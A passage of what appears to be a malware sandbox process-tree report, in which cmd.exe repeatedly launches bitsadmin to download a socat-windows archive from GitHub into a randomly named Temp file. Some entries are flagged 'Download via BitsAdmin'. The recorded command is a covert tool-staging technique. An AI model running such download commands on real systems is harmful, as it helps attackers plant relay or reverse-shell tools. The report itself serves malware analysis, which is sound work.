                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                            PID:1920
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                              bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                PID:1588
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                PID:1636
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                  bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                    PID:852
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                    PID:1048
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                      bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                        PID:2012
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                        PID:1604
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                          bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                            PID:1616
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                            PID:1776
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                              bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                PID:2004
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                PID:1608
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                  bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                    PID:268
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                    PID:908
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                      bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                      • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                      PID:1708
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                      PID:1692
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                        bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                        • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                        PID:1832
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                        PID:1748
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                          bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                            PID:1820
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                            PID:1360
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                              bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                              • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                              PID:1616
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                              PID:1352
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                  PID:1824
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                  PID:1864
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                    bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                      PID:1872
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                      PID:1708
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                        bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                        • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                                        PID:1700
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                        PID:1096
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                          bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                            PID:1288
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                            PID:1160
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                              bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                              • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                                              PID:1592
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                              PID:1144
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                  PID:1744
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                  PID:988
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                    bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                    • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                                                    PID:1524
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                    PID:1748
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                      bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                      • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                                                      PID:908
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                      PID:956
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                        bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                        • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                                                        PID:1380
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                        PID:588
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                          bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                            PID:808
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                            PID:1600
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                              bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                PID:1652
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                PID:2000
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                  bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                    PID:1756
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                    PID:1048
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                      bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                        PID:1872
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                        PID:1532
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                          bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                            PID:1776
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                            PID:1120
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                              bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                PID:1192
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                PID:1820
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                  bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                  • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                                                                                  PID:1616
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:2020
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                    bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:1052
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:1824
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                        bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:1308
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:1676
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                            bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:2036
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:1532
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:1708
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:2044
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                    bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                                                                                                    PID:1380
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:1336
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                      bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                                                                                                      PID:1592
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:2024
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                        bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                        • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                                                                                                        PID:2016
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:1292
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                          bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:1872
